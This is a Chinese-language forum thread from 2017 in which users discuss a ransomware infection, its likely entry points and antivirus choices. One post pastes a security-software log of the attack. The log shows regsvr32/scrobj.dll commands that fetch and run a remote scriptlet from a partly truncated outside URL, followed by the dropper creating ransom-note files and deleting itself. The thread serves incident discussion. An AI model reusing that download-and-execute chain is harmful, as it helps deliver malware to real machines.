勒索軟件unlock程式

显示全部楼层 · 发表于 2017-5-9 13:53:42

被勒索前是用什么杀软？

显示全部楼层 · 发表于 2017-5-10 08:32:18

xxl11231220 发表于 2017-5-9 13:53
被勒索前是用什么杀软？

那是我朋友電腦，他電腦沒有防毒軟件，我推薦他使用趨勢科技了

這個勒索軟件因該從RDP漏洞進來的，他關了windows update更新

显示全部楼层 · 发表于 2017-5-10 08:51:04

sky520471 发表于 2017-5-10 08:32
那是我朋友電腦，他電腦沒有防毒軟件，我推薦他使用趨勢科技了

這個勒索軟件因該從RDP漏洞進來的，他 ...

及时更新修补已知漏洞还是很重要的，不说了我得赶紧打补丁去

显示全部楼层 · 发表于 2017-5-11 01:45:28

这个勒索病毒这里有人上传样本吗

显示全部楼层 · 发表于 2017-5-11 08:54:33

本帖最后由 liulangzhecgr 于 2017-5-11 09:20 编辑

利用网页漏洞，不过需要权限...某不幸朋友赋值权限导致。

显示全部楼层 · 发表于 2017-5-11 09:19:36

2017/5/11 08:35:13 创建新进程允许
进程: c:\program files\internet explorer\iexplore.exe
目标: c:\windows\system32\rundll32.exe
命令行: "C:\Windows\System32\rundll32.exe" SHELL32.DLL,ShellExec_RunDLL regsvr32.exe scrobj.dll /s /u /i:http://44t24846e6zfnb8bz.sawits. ... 62ed1c4030a91fa.sct
规则: [应用程序]*

2017/5/11 08:35:25 创建新进程阻止
进程: c:\windows\system32\rundll32.exe
目标: c:\windows\system32\regsvr32.exe
命令行: "C:\Windows\system32\regsvr32.exe" scrobj.dll /s /u /i:http://44t24846e6zfnb8bz.sawits. ... 62ed1c4030a91fa.sct
规则: [应用程序]*

2017/5/11 08:37:25 创建新进程允许
进程: c:\windows\system32\svchost.exe
目标: c:\windows\system32\rundll32.exe
命令行: "C:\Windows\System32\rundll32.exe" SHELL32.DLL,ShellExec_RunDLL regsvr32.exe scrobj.dll /s /u /i:http://44t24846e6zfnb8bz.sawits. ... 62ed1c4030a91fa.sct
规则: [应用程序]c:\windows\system32\svchost.exe

2017/5/11 08:37:28 向其他进程复制句柄允许
进程: c:\windows\system32\svchost.exe
目标: c:\program files\internet explorer\iexplore.exe
句柄: (Process) c:\windows\system32\rundll32.exe
规则: [应用程序]c:\windows\system32\svchost.exe

2017/5/11 08:37:30 向其他进程复制句柄允许
进程: c:\windows\system32\svchost.exe
目标: c:\program files\internet explorer\iexplore.exe
句柄: (Thread) c:\windows\system32\rundll32.exe
规则: [应用程序]c:\windows\system32\svchost.exe

2017/5/11 08:37:33 创建新进程允许
进程: c:\windows\system32\rundll32.exe
目标: c:\windows\system32\regsvr32.exe
命令行: "C:\Windows\system32\regsvr32.exe" scrobj.dll /s /u /i:http://44t24846e6zfnb8bz.sawits. ... 62ed1c4030a91fa.sct
规则: [应用程序]*

2017/5/11 08:38:39 创建新进程允许
进程: c:\windows\system32\svchost.exe
目标: c:\windows\system32\rundll32.exe
命令行: "C:\Windows\System32\rundll32.exe" SHELL32.DLL,ShellExec_RunDLL regsvr32.exe scrobj.dll /s /u /i:http://44t24846e6zfnb8bz.sawits. ... 62ed1c4030a91fa.sct
规则: [应用程序]c:\windows\system32\svchost.exe

2017/5/11 08:38:41 向其他进程复制句柄允许
进程: c:\windows\system32\svchost.exe
目标: c:\program files\internet explorer\iexplore.exe
句柄: (Process) c:\windows\system32\rundll32.exe
规则: [应用程序]c:\windows\system32\svchost.exe

2017/5/11 08:38:43 向其他进程复制句柄允许
进程: c:\windows\system32\svchost.exe
目标: c:\program files\internet explorer\iexplore.exe
句柄: (Thread) c:\windows\system32\rundll32.exe
规则: [应用程序]c:\windows\system32\svchost.exe

2017/5/11 08:38:47 创建新进程允许
进程: c:\windows\system32\rundll32.exe
目标: c:\windows\system32\regsvr32.exe
命令行: "C:\Windows\system32\regsvr32.exe" scrobj.dll /s /u /i:http://44t24846e6zfnb8bz.sawits. ... 62ed1c4030a91fa.sct
规则: [应用程序]*

2017/5/11 08:39:58 创建新进程允许
进程: c:\windows\system32\svchost.exe
目标: c:\windows\system32\rundll32.exe
命令行: "C:\Windows\System32\rundll32.exe" SHELL32.DLL,ShellExec_RunDLL regsvr32.exe scrobj.dll /s /u /i:http://44t24846e6zfnb8bz.sawits. ... 62ed1c4030a91fa.sct
规则: [应用程序]c:\windows\system32\svchost.exe

2017/5/11 08:40:03 向其他进程复制句柄允许
进程: c:\windows\system32\svchost.exe
目标: c:\program files\internet explorer\iexplore.exe
句柄: (Process) c:\windows\system32\rundll32.exe
规则: [应用程序]c:\windows\system32\svchost.exe

2017/5/11 08:40:06 向其他进程复制句柄允许
进程: c:\windows\system32\svchost.exe
目标: c:\program files\internet explorer\iexplore.exe
句柄: (Thread) c:\windows\system32\rundll32.exe
规则: [应用程序]c:\windows\system32\svchost.exe

2017/5/11 08:40:09 创建新进程允许
进程: c:\windows\system32\rundll32.exe
目标: c:\windows\system32\regsvr32.exe
命令行: "C:\Windows\system32\regsvr32.exe" scrobj.dll /s /u /i:http://44t24846e6zfnb8bz.sawits. ... 62ed1c4030a91fa.sct
规则: [应用程序]*

2017/5/11 08:40:34 修改文件阻止
进程: c:\users\yiqing\appdata\local\temp\low\a.exe
目标: E:\MyTools\FixTools\RegBak_1.2_HA_XiaZaiBa\RegBak 1.2\date\2015-03-25\Regbak.chm
规则: [文件组]所有执行文件 -> [文件]*; *.chm

2017/5/11 08:40:47 修改文件阻止
进程: c:\users\yiqing\appdata\local\temp\low\a.exe
目标: E:\MyTools\FixTools\RegBak_1.2_HA_XiaZaiBa\RegBak 1.2\regbak.chm
规则: [文件组]所有执行文件 -> [文件]*; *.chm

2017/5/11 08:40:51 修改文件阻止
进程: c:\users\yiqing\appdata\local\temp\low\a.exe
目标: E:\MyTools\FixTools\Registry_Winner_5.9.7.25\manual.chm
规则: [文件组]所有执行文件 -> [文件]*; *.chm

2017/5/11 08:41:01 修改文件阻止
进程: c:\users\yiqing\appdata\local\temp\low\a.exe
目标: E:\MyTools\RestoreTools\RegBak_1.2_HA_XiaZaiBa\RegBak 1.2\regbak.chm
规则: [文件组]所有执行文件 -> [文件]*; *.chm

2017/5/11 08:41:37 修改文件阻止
进程: c:\users\yiqing\appdata\local\temp\low\a.exe
目标: E:\MyTools\Scaner\ViewWizard_2.72_\[句柄精灵]ViewWizard_2.8_(含新版3.1)\更强大的新版 ViewWizard 3.1（最牛窗口编程）\mscomctl.ocx
规则: [文件组]所有执行文件 -> [文件]*; *.ocx

2017/5/11 08:41:58 创建文件允许
进程: c:\users\yiqing\appdata\local\temp\low\a.exe
目标: C:\_READ_THIS_FILE_WLXE_.hta
规则: [文件]?:\

2017/5/11 08:43:12 创建新进程允许
进程: c:\users\yiqing\appdata\local\temp\low\a.exe
目标: c:\windows\system32\mshta.exe
命令行: "C:\Windows\System32\mshta.exe" "C:\_READ_THIS_FILE_WLXE_.hta"
规则: [应用程序]*

2017/5/11 08:43:20 创建文件允许
进程: c:\users\yiqing\appdata\local\temp\low\a.exe
目标: C:\_READ_THIS_FILE_JYTZXT1G_.txt
规则: [文件]?:\

2017/5/11 08:44:02 创建新进程允许
进程: c:\users\yiqing\appdata\local\temp\low\a.exe
目标: c:\windows\system32\notepad.exe
命令行: "C:\Windows\System32\NOTEPAD.EXE" C:\_READ_THIS_FILE_JYTZXT1G_.txt
规则: [应用程序]*

2017/5/11 08:46:21 修改文件允许
进程: c:\users\yiqing\appdata\local\temp\low\a.exe
目标: \Device\NamedPipe\wkssvc
规则: [文件组]访问设备 -> [文件]\device\namedpipe\wkssvc

2017/5/11 08:46:49 创建新进程允许
进程: c:\users\yiqing\appdata\local\temp\low\a.exe
目标: c:\windows\system32\cmd.exe
命令行: "C:\Windows\system32\cmd.exe"
规则: [应用程序]*

2017/5/11 08:47:05 创建新进程允许
进程: c:\windows\system32\cmd.exe
目标: c:\windows\system32\taskkill.exe
命令行: taskkill /f /im "a.exe"
规则: [应用程序]*

2017/5/11 08:51:31 创建新进程允许
进程: c:\windows\system32\cmd.exe
目标: c:\windows\system32\ping.exe
命令行: ping -n 1 127.0.0.1
规则: [应用程序]*

2017/5/11 08:51:34 向其他进程复制句柄允许
进程: c:\windows\system32\conhost.exe
目标: c:\windows\system32\ping.exe
句柄: (Event) 0x0000007C
规则: [应用程序]*

2017/5/11 08:51:49 删除文件允许
进程: c:\windows\system32\cmd.exe
目标: C:\Users\yiqing\AppData\Local\Temp\Low\a.exe
规则: [文件组]所有执行文件 -> [文件]*; *.exe

[其他相关] 勒索軟件unlock程式